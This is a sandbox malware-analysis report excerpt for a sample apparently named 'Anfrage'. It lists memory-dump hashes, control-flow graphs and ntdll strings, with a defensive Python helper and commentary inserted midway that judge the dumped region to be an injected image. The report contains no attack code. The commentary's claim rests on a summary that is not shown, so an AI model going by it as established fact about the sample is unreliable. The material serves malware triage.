                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2f9ab252a22c603d68f50b1027a9ce82bedc3b61e561d141373683953b3b720b
                                                                          • Instruction ID: 6f33cc5097de4c8915a20b3597da9df742e3a068ebf4b5bab6e090f0a5c0c2da
                                                                          • Opcode Fuzzy Hash: 2f9ab252a22c603d68f50b1027a9ce82bedc3b61e561d141373683953b3b720b
                                                                          • Instruction Fuzzy Hash: EA90027164240007410572584414616500A47F2241B55C022E2014954DC62989956125
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 62563feab5bb6a61e812a2ba43c4d7fe21c35a2280d986245c81b7d922b48a10
                                                                          • Instruction ID: f598b003821b4534f36fb74a36c29f1e650b8e0bbbed229d08b048d3dc02495b
                                                                          • Opcode Fuzzy Hash: 62563feab5bb6a61e812a2ba43c4d7fe21c35a2280d986245c81b7d922b48a10
                                                                          • Instruction Fuzzy Hash: 9190023164544847D14072584404A46101547E2345F55C012A1064A58D97298E59B661
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4e6cd987209747bd5df249d7c0edfb1a30bed072881b0fd8c6d64396cd04387b
                                                                          • Instruction ID: e47e2a529251bfc4403017aed62e307199d6baa183da3d59cf5717a6a3eda0d7
                                                                          • Opcode Fuzzy Hash: 4e6cd987209747bd5df249d7c0edfb1a30bed072881b0fd8c6d64396cd04387b
                                                                          • Instruction Fuzzy Hash: 8B90023164140807D1807258440464A100547E3341F95C016A1025A18DCB198B5D77A1
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5e330cdcc62f8a73d43af460f530cad6c6dc91f5b082b7503ea7a54bf111b281
                                                                          • Instruction ID: 68112a2981732014e35a125a163afe9d306d1c1c1a3e5c706f89166d45cb7807
                                                                          • Opcode Fuzzy Hash: 5e330cdcc62f8a73d43af460f530cad6c6dc91f5b082b7503ea7a54bf111b281
                                                                          • Instruction Fuzzy Hash: EB90023164140807D10472584804686100547E2341F55C012A7024A19E976989957131
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 03e3e92f1b1538fdd47109c52c65c7dc6af948940b2f2fa0cc1d60634e52b637
                                                                          • Instruction ID: dc0ce97a1971c664db945468d432647b29560365a339f67f545be0056dac5ec3
                                                                          • Opcode Fuzzy Hash: 03e3e92f1b1538fdd47109c52c65c7dc6af948940b2f2fa0cc1d60634e52b637
                                                                          • Instruction Fuzzy Hash: B0900231A4540807D15072584414746100547E2341F55C012A1024A18D87598B5976A1
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                          • Instruction ID: 50d509fb022f261c47490fbb8a56ae7d077d8f032693dead7fe8211166fcc7ea
                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                          • Instruction Fuzzy Hash:

                                                                          Control-flow Graph
                                                                          • Summary (rendered graph not reproduced; the executed/not-executed block colouring is lost in the text): entry block 36402890-364028b3; blocks span 36402890-364029b1 and 3643a4bc-3643a5c9; six call sites to 36410050; no named API calls.
                                                                          • Block and edge list: control_flow_graph 1125 36402890-364028b3 1126 364028b9-364028cc 1125->1126 1127 3643a4bc-3643a4c0 1125->1127 1129 364028dd-364028df 1126->1129 1130 364028ce-364028d7 1126->1130 1127->1126 1128 3643a4c6-3643a4ca 1127->1128 1128->1126 1132 3643a4d0-3643a4d4 1128->1132 1131 364028e1-364028e5 1129->1131 1130->1129 1133 3643a57e-3643a585 1130->1133 1134 36402988-3640298e 1131->1134 1135 364028eb-364028fa 1131->1135 1132->1126 1136 3643a4da-3643a4de 1132->1136 1133->1129 1139 36402908-3640290c 1134->1139 1137 36402900-36402905 1135->1137 1138 3643a58a-3643a58d 1135->1138 1136->1126 1140 3643a4e4-3643a4eb 1136->1140 1137->1139 1138->1139 1139->1131 1141 3640290e-3640291b 1139->1141 1142 3643a564-3643a56c 1140->1142 1143 3643a4ed-3643a4f4 1140->1143 1144 3643a592-3643a599 1141->1144 1145 36402921 1141->1145 1142->1126 1146 3643a572-3643a576 1142->1146 1147 3643a4f6-3643a4fe 1143->1147 1148 3643a50b 1143->1148 1157 3643a5a1-3643a5c9 call 36410050 1144->1157 1150 36402924-36402926 1145->1150 1146->1126 1151 3643a57c call 36410050 1146->1151 1147->1126 1152 3643a504-3643a509 1147->1152 1149 3643a510-3643a536 call 36410050 1148->1149 1165 3643a55d-3643a55f 1149->1165 1154 36402993-36402995 1150->1154 1155 36402928-3640292a 1150->1155 1151->1165 1152->1149 1154->1155 1160 36402997-364029b1 call 36410050 1154->1160 1162 36402946-36402966 call 36410050 1155->1162 1163 3640292c-3640292e 1155->1163 1174 36402969-36402974 1160->1174 1162->1174 1163->1162 1168 36402930-36402944 call 36410050 1163->1168 1171 36402981-36402985 1165->1171 1168->1162 1174->1150 1176 36402976-36402979 1174->1176 1176->1157 1177 3640297f 1176->1177 1177->1171
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                          • API String ID: 48624451-2108815105
                                                                          • Opcode ID: 169df4e8c5205a8aea5ea90811b5b7f7dfec87d9671df72a29e8741e05b037b1
                                                                          • Instruction ID: 6195043c5b1aab5237b184575bc2d8260ea12b8dc4affd266b69de249fe53173
                                                                          • Opcode Fuzzy Hash: 169df4e8c5205a8aea5ea90811b5b7f7dfec87d9671df72a29e8741e05b037b1
                                                                          • Instruction Fuzzy Hash: 5F51E9BAE00226BFEB11DF59888097FFBB8BB092447608279E454D7681D674DE50CFE0
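The Memory Dump Source lines above name each dump as a dotted tuple, and the three eight-digit fields after the base address read as Win32 memory constants: 0x40 is PAGE_EXECUTE_READWRITE, 0x1000 is MEM_COMMIT and 0x20000 is MEM_PRIVATE. That is the detail a triager wants from these entries: "based on PE: true" for a region that is committed, private (not image-backed) and writable+executable means a PE image that was written into memory rather than mapped by the loader. The helper below is an added example, not Joe Sandbox code; the field order it assumes (process index, run, counter, base, protect, state, type, reserved) is inferred from the names on this page and is an assumption, while the constant values come from winnt.h.

```python
"""Decode the .sdmp names that Joe Sandbox uses for memory dumps.

Added example, not part of Joe Sandbox.  The field layout
    <proc>.<run>.<counter>.<base>.<protect>.<state>.<type>.<reserved>.sdmp
is inferred from the names on this page (assumption); the three memory
fields are decoded with the documented winnt.h constants.
"""
import re

# winnt.h page-protection values (low byte of the protect field)
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_GUARD = 0x100
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXEC_WRITE = ("PAGE_EXECUTE_READWRITE", "PAGE_EXECUTE_WRITECOPY")

HEX8 = r"[0-9A-Fa-f]{8}"
DUMP_RE = re.compile(
    r"^(?P<proc>%s)\.(?P<run>%s)\.(?P<counter>[0-9A-Fa-f]+)\.(?P<base>[0-9A-Fa-f]{16})"
    r"\.(?P<protect>%s)\.(?P<state>%s)\.(?P<type>%s)\.(?P<reserved>%s)\.sdmp$"
    % (HEX8, HEX8, HEX8, HEX8, HEX8, HEX8)
)
# The "Source File:" line as it appears in the report text.
SOURCE_RE = re.compile(
    r"Source File:\s*(?P<name>\S+?),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)


def parse_dump_name(name):
    """Split an .sdmp file name into decoded fields."""
    m = DUMP_RE.match(name.strip())
    if not m:
        raise ValueError("not a Joe Sandbox .sdmp name: %r" % name)
    protect = int(m["protect"], 16)
    state = int(m["state"], 16)
    mtype = int(m["type"], 16)
    return {
        "proc": int(m["proc"], 16),          # Joe Sandbox process index (assumption)
        "base": int(m["base"], 16),
        "protect": PAGE_PROTECT.get(protect & 0xFF, "0x%x" % protect),
        "guard": bool(protect & PAGE_GUARD),
        "state": MEM_STATE.get(state, "0x%x" % state),
        "type": MEM_TYPE.get(mtype, "0x%x" % mtype),
    }


def parse_source_line(line):
    """Parse a 'Source File: ..., Offset: ..., based on PE: ...' report line."""
    m = SOURCE_RE.search(line)
    if not m:
        raise ValueError("not a Memory Dump Source line: %r" % line)
    info = parse_dump_name(m["name"])
    info["offset"] = int(m["offset"], 16)
    info["based_on_pe"] = m["pe"] == "true"
    return info


def is_injected_image(info):
    """Committed, private, writable+executable memory holding a PE image:
    the footprint of a manually mapped or unpacked module, as opposed to a
    loader-mapped DLL, which would be MEM_IMAGE."""
    return (info["based_on_pe"] and info["state"] == "MEM_COMMIT"
            and info["type"] == "MEM_PRIVATE" and info["protect"] in EXEC_WRITE)


# Constructed from the Source File line of the entry above.
SAMPLE_LINE = ("Source File: 00000007.00000002.2511246780.0000000036390000.00000040"
               ".00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true")

if __name__ == "__main__":
    region = parse_source_line(SAMPLE_LINE)
    print(region)
    print("injected image:", is_injected_image(region))
```

Run against the three Associated dumps as well: they carry the same 00000040.00001000.00020000 triple, so the whole 36390000 region is one private RWX allocation holding a PE, which is what the "Maps a DLL or memory area into another process" signature in the summary is pointing at.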

                                                                          Control-flow Graph
                                                                          • Summary (rendered graph not reproduced; the executed/not-executed block colouring is lost in the text): entry block 36472410-36472433; blocks span 36472410-36472619; six call sites to 36410510; no named API calls.
                                                                          • Block and edge list: control_flow_graph 1178 36472410-36472433 1179 364724ec-364724ff 1178->1179 1180 36472439-3647243d 1178->1180 1182 36472513-36472515 1179->1182 1183 36472501-3647250a 1179->1183 1180->1179 1181 36472443-36472447 1180->1181 1181->1179 1184 3647244d-36472451 1181->1184 1186 36472517-3647251b 1182->1186 1183->1182 1185 3647250c 1183->1185 1184->1179 1187 36472457-3647245b 1184->1187 1185->1182 1188 3647251d-3647252c 1186->1188 1189 36472538-3647253e 1186->1189 1187->1179 1190 36472461-36472468 1187->1190 1191 36472540 1188->1191 1192 3647252e-36472536 1188->1192 1193 36472543-36472547 1189->1193 1194 364724b6-364724be 1190->1194 1195 3647246a-36472471 1190->1195 1191->1193 1192->1193 1193->1186 1196 36472549-36472556 1193->1196 1194->1179 1201 364724c0-364724c4 1194->1201 1197 36472484 1195->1197 1198 36472473-3647247b 1195->1198 1199 36472564 1196->1199 1200 36472558-36472562 1196->1200 1203 36472489-364724ab call 36410510 1197->1203 1198->1179 1202 3647247d-36472482 1198->1202 1204 36472567-36472569 1199->1204 1200->1204 1201->1179 1205 364724c6-364724ea call 36410510 1201->1205 1202->1203 1216 364724ae-364724b1 1203->1216 1206 3647258d-3647258f 1204->1206 1207 3647256b-3647256d 1204->1207 1205->1216 1212 36472591-36472593 1206->1212 1213 364725ae-364725d0 call 36410510 1206->1213 1207->1206 1210 3647256f-3647258b call 36410510 1207->1210 1223 364725d3-364725df 1210->1223 1212->1213 1217 36472595-364725ab call 36410510 1212->1217 1213->1223 1222 36472615-36472619 1216->1222 1217->1213 1223->1204 1225 364725e1-364725e4 1223->1225 1226 364725e6-36472610 call 36410510 1225->1226 1227 36472613 1225->1227 1226->1227 1227->1222
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                          • API String ID: 48624451-2108815105
                                                                          • Opcode ID: 582cf4d6724dcc700659026644fda3ad1481015d03971a8e31e568ed7d4f0fe4
                                                                          • Instruction ID: 7d772238f71e7030b6183c07f44f7d41196e6488c2449105f31dda7a9440de51
                                                                          • Opcode Fuzzy Hash: 582cf4d6724dcc700659026644fda3ad1481015d03971a8e31e568ed7d4f0fe4
                                                                          • Instruction Fuzzy Hash: 95513775E00655AFEB20CF6CCC808BFBBF8EF44244B508859E4A5D3745EAB4EA00CB65

                                                                          Control-flow Graph
                                                                          • Summary (rendered graph not reproduced; the executed/not-executed block colouring is lost in the text): entry block 3649a670-3649a6e9; blocks span 3649a670-3649a9a1; the entry block calls 363d2410 twice, block 1433 calls 363d25b0 twice and 36404c30 once; RtlDebugPrintTimes is invoked from eight blocks.
                                                                          • Block and edge list: control_flow_graph 1427 3649a670-3649a6e9 call 363d2410 * 2 RtlDebugPrintTimes 1433 3649a89f-3649a8c4 call 363d25b0 * 2 call 36404c30 1427->1433 1434 3649a6ef-3649a6fa 1427->1434 1436 3649a6fc-3649a709 1434->1436 1437 3649a724 1434->1437 1439 3649a70b-3649a70d 1436->1439 1440 3649a70f-3649a715 1436->1440 1441 3649a728-3649a734 1437->1441 1439->1440 1443 3649a71b-3649a722 1440->1443 1444 3649a7f3-3649a7f5 1440->1444 1445 3649a741-3649a743 1441->1445 1443->1441 1447 3649a81f-3649a821 1444->1447 1448 3649a745-3649a747 1445->1448 1449 3649a736-3649a73c 1445->1449 1453 3649a755-3649a77d RtlDebugPrintTimes 1447->1453 1454 3649a827-3649a834 1447->1454 1448->1447 1451 3649a74c-3649a750 1449->1451 1452 3649a73e 1449->1452 1456 3649a86c-3649a86e 1451->1456 1452->1445 1453->1433 1467 3649a783-3649a7a0 RtlDebugPrintTimes 1453->1467 1457 3649a85a-3649a866 1454->1457 1458 3649a836-3649a843 1454->1458 1456->1447 1461 3649a87b-3649a87d 1457->1461 1459 3649a84b-3649a851 1458->1459 1460 3649a845-3649a849 1458->1460 1463 3649a96b-3649a96d 1459->1463 1464 3649a857 1459->1464 1460->1459 1465 3649a87f-3649a881 1461->1465 1466 3649a870-3649a876 1461->1466 1468 3649a883-3649a889 1463->1468 1464->1457 1465->1468 1469 3649a878 1466->1469 1470 3649a8c7-3649a8cb 1466->1470 1467->1433 1475 3649a7a6-3649a7cc RtlDebugPrintTimes 1467->1475 1472 3649a88b-3649a89d RtlDebugPrintTimes 1468->1472 1473 3649a8d0-3649a8f4 RtlDebugPrintTimes 1468->1473 1469->1461 1471 3649a99f-3649a9a1 1470->1471 1472->1433 1473->1433 1479 3649a8f6-3649a913 RtlDebugPrintTimes 1473->1479 1475->1433 1480 3649a7d2-3649a7d4 1475->1480 1479->1433 1487 3649a915-3649a944 RtlDebugPrintTimes 1479->1487 1481 3649a7f7-3649a80a 1480->1481 1482 3649a7d6-3649a7e3 1480->1482 1486 3649a817-3649a819 1481->1486 1484 3649a7eb-3649a7f1 1482->1484 1485 3649a7e5-3649a7e9 1482->1485 1484->1444 1484->1481 1485->1484 1488 3649a81b-3649a81d 1486->1488 1489 3649a80c-3649a812 1486->1489 1487->1433 1493 3649a94a-3649a94c 1487->1493 1488->1447 1490 3649a868-3649a86a 1489->1490 1491 3649a814 1489->1491 1490->1456 1491->1486 1494 3649a94e-3649a95b 1493->1494 1495 3649a972-3649a985 1493->1495 1496 3649a95d-3649a961 1494->1496 1497 3649a963-3649a969 1494->1497 1498 3649a992-3649a994 1495->1498 1496->1497 1497->1463 1497->1495 1499 3649a987-3649a98d 1498->1499 1500 3649a996 1498->1500 1501 3649a99b-3649a99d 1499->1501 1502 3649a98f 1499->1502 1500->1465 1501->1471 1502->1498
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: HEAP:
                                                                          • API String ID: 3446177414-2466845122

                                                                          Strings
                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 36434655
                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 364346FC
                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 36434787
                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 36434725
                                                                          • Execute=1, xrefs: 36434713
                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 36434742
                                                                          • ExecuteOptions, xrefs: 364346A0
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                          • API String ID: 0-484625025
                                                                          Strings
                                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 364279D5
                                                                          • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 36427AE6
                                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 364279D0, 364279F5
                                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 364279FA
                                                                          • Actx , xrefs: 36427A0C, 36427A73
                                                                          • SsHd, xrefs: 363DA3E4
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                          • API String ID: 0-1988757188
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                          • API String ID: 3446177414-4227709934
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                          • API String ID: 3446177414-3492000579
                                                                          Strings
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 36419AC5, 36419B06
                                                                          • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36419AB4
                                                                          • LdrpLoadShimEngine, xrefs: 36419ABB, 36419AFC
                                                                          • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36419AF6
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 3446177414-3589223738
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: @3K6$LdrpUnloadNode$Unmapping DLL "%wZ"$dfK6@3K6@3K6$minkernel\ntdll\ldrsnap.c
                                                                          • API String ID: 3446177414-648166177
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                          • API String ID: 3446177414-3224558752
                                                                          Strings
                                                                          • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 3646F263
                                                                          • HEAP: , xrefs: 3646F15D
                                                                          • Entry Heap Size , xrefs: 3646F26D
                                                                          • ---------------------------------------, xrefs: 3646F279
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                          • API String ID: 3446177414-1102453626
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                          • API String ID: 3446177414-1222099010
                                                                          Similarity
                                                                          • API ID: __aulldvrm
                                                                          • String ID: +$-$0$0
                                                                          • API String ID: 1302938615-699404926
                                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                          • Instruction ID: aa7dbe15aa8c3f99e9617d68374ef79945da7865ea573a44b045380a36002ba3
                                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                          • Instruction Fuzzy Hash: 2181F378E113398EEB06DE65C8507EEFBB1AF85358F54453AD860A7390CB368841CF59
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $$@
                                                                          • API String ID: 3446177414-1194432280
                                                                          • Opcode ID: cd1ebeda87cc7b7ef41dcbb9f6bcb2dcaf769bea0fcd3a3dc74bb7da752c255e
                                                                          • Instruction ID: 35c443d446f763f393384e6da856c459a67876997b1c539ab84f388c79eaf02b
                                                                          • Opcode Fuzzy Hash: cd1ebeda87cc7b7ef41dcbb9f6bcb2dcaf769bea0fcd3a3dc74bb7da752c255e
                                                                          • Instruction Fuzzy Hash: A78129B6D002699FDB22CF54CC45BDAB7B8AF08750F1141EAE909B7280D7709E85CFA5
                                                                          APIs
                                                                          Strings
                                                                          • LdrpFindDllActivationContext, xrefs: 36433636, 36433662
                                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 3643362F
                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 36433640, 3643366C
                                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 3643365C
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                          • API String ID: 3446177414-3779518884
                                                                          • Opcode ID: 8badc6f2c1275b903254922a684064268bd3f6b4ba2d6677660f5014adb8f50d
                                                                          • Instruction ID: ef577392996e8b289261f8516b39fda4e09f62b695eec5f5633c82f7010584d9
                                                                          • Opcode Fuzzy Hash: 8badc6f2c1275b903254922a684064268bd3f6b4ba2d6677660f5014adb8f50d
                                                                          • Instruction Fuzzy Hash: 94316B66D683519FFB12EE05C884B1573A4AF01394F564066F9046F363EBA2DC88C7F5
                                                                          Strings
                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3642A992
                                                                          • LdrpDynamicShimModule, xrefs: 3642A998
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 3642A9A2
                                                                          • TG96, xrefs: 363E2462
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
